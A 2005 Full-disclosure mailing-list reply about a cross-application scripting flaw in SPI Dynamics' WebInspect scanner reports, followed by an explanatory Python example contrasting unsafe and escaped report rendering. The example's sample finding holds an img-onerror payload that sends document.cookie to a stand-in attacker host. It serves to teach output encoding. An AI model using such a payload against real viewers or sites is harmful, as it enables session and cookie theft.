
| Subject: | Re[2]: [Full-disclosure] SPI Dynamics WebInspect Cross-Application Scripting (XAS) |
|---|---|
| Date: | Fri, 29 Jul 2005 14:04:52 +0400 |
Dear DAN MORRILL,

--Wednesday, July 27, 2005, 10:08:12 PM, you wrote to 3APA3A@SECURITY.NNOV.RU:

DM> I got the official notice from SPI Dynamics today on this issue. I am in no
DM> way slamming people at all, but the interesting response was inability to
DM> reproduce the XAS issue.

SPI Dynamics has already published an advisory on this issue and fixed this vulnerability, at least partially.

Revisions:
V1.0 (July 27, 2005): Internal Release
V1.1 (July 28, 2005): Bulletin published

The effectiveness of full disclosure is proven again. A vulnerability known since April was fixed in 2 days.

DM> Just a curiosity question based on the idea that we are all out there
DM> discovering things, that we will or will not give up to folks depending on
DM> what we discover. It's the inability to reproduce the issue that interests me
DM> the most, and what as a community should we do when no one else can verify
DM> our results? Well, outside of providing POC code, that may or may not work.

According to the reporter, the vendor was provided with

1. Problem description
2. PoC code
3. Screenshot
4. Example of the generated report.

You can find it at http://www.security.nnov.ru/Fnews30.html

The last (unreplied) message sent to the vendor was

-=-=-=-=-=-=-= begin quote =-=-=-=-=-=-=-
Sent: Wednesday, April 20, 2005 3:05 AM
To: Sam Shober
Subject: RE: [CAS-01370] SPI Dynamics WebInspect Cross-Application Scripting (XAS)

Inline.

> Opening the scan data you sent on a default install of WebInspect 5.0.196 shows how you are able to execute JavaScript in the report view and reload the vulnerability.htm.

It's ok. This is a task of the PoC.
-=-=-=-=-=-=-= end quote =-=-=-=-=-=-=-

As you can see, the security company's representative was able to reproduce the problem, but failed to understand what XAS is (and probably what a PoC is) and how it affects the security of a security-related product. I agree with the reporter: he did everything to make the vendor fix the problem. Should we also educate the support staff of the company on how to handle security alerts?

This time full disclosure before the vendor fix was the _only_ solution, and it was quite effective. Now SPI Dynamics has published an e-mail address for security alerts, and probably this e-mail will be monitored by more qualified staff in future. Making benefits from its faults is the best a company can do in this case. Customers of SPI Dynamics can feel more secure. Isn't it good?

There are many interesting things about vulnerability disclosure. Vendor coordination is not the only one. Of course, a standard in this area is required; RFPolicy is good, but it has no force.

Another problem with disclosure is information rights. You may like it or not, but vulnerability information has its price, and this price is high. It's not clear to a vulnerability researcher how he can use his rights to this information and how these rights affect the product vendor and his rights. I feel we will have many problems with this in future.

-- 
~/ZARAZA
http://www.security.nnov.ru/
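The XAS pattern this thread turns on, shown in general form as an added example (this is not SPI Dynamics' code, the reporter's PoC, or anything from the advisory): a scanner copies strings it received from the scanned server (URLs, parameter names, response fragments) into an HTML report, and if those strings are concatenated in unencoded, a hostile target gets its own script executed in whatever viewer opens the report, typically on the tester's machine with the tester's privileges. The `Finding` record, `render_report`, the hostile sample and the host names below are all constructed for the illustration.

```python
"""Cross-application scripting via a scanner's HTML report: unsafe vs. hardened rendering."""
import html
import re
from dataclasses import dataclass
from typing import Iterable


@dataclass
class Finding:
    """One scanner finding. Every field originates from the *target*, so all are untrusted."""
    url: str
    parameter: str
    evidence: str  # raw fragment copied from the target's response body


def render_row_unsafe(f: Finding) -> str:
    # Target-controlled strings go straight into the report's markup.
    # Any tag the target reflected (or planted) is now live in the report viewer.
    return f"<tr><td>{f.url}</td><td>{f.parameter}</td><td>{f.evidence}</td></tr>"


def render_row_safe(f: Finding) -> str:
    # Same data, but each string is encoded for an HTML text context before insertion,
    # so '<', '>', '&' and both quote characters survive only as entities.
    cells = (
        html.escape(f.url, quote=True),
        html.escape(f.parameter, quote=True),
        html.escape(f.evidence, quote=True),
    )
    return "<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>"


def render_report(findings: Iterable[Finding], safe: bool = True) -> str:
    """Build a complete report page from a list of findings."""
    row = render_row_safe if safe else render_row_unsafe
    body = "".join(row(f) for f in findings)
    return (
        "<html><body><h1>Scan report</h1><table>"
        "<tr><th>URL</th><th>Parameter</th><th>Evidence</th></tr>"
        f"{body}</table></body></html>"
    )


# Tags that would execute or load script when the report is opened in a browser-based viewer.
_LIVE_TAG = re.compile(r"<\s*(script|img|svg|iframe|object|embed)\b", re.IGNORECASE)


def has_live_tag(markup: str) -> bool:
    """Crude check used here only to show whether target-supplied markup survived as a real tag."""
    return _LIVE_TAG.search(markup) is not None


# Constructed sample: a hostile target whose response to our probe carries a payload aimed
# at the *scanner operator*, not at the target's own users.
HOSTILE_TARGET = Finding(
    url="http://target.example/search?q=%3Cscript%3E",
    parameter="q",
    evidence='<img src=x onerror="fetch(\'http://attacker.example/?r=\'+document.cookie)">',
)


if __name__ == "__main__":
    unsafe = render_report([HOSTILE_TARGET], safe=False)
    hardened = render_report([HOSTILE_TARGET], safe=True)
    print("unsafe report carries live tag:  ", has_live_tag(unsafe))
    print("hardened report carries live tag:", has_live_tag(hardened))
```

The point the vendor's "you are able to execute JavaScript in the report view" reply missed is visible in the unsafe branch: the evidence column is exactly where a scanner is obliged to show target-supplied text, so encoding on output (not filtering on input) is the only fix that keeps the report useful while removing the target's ability to script the tester's viewer.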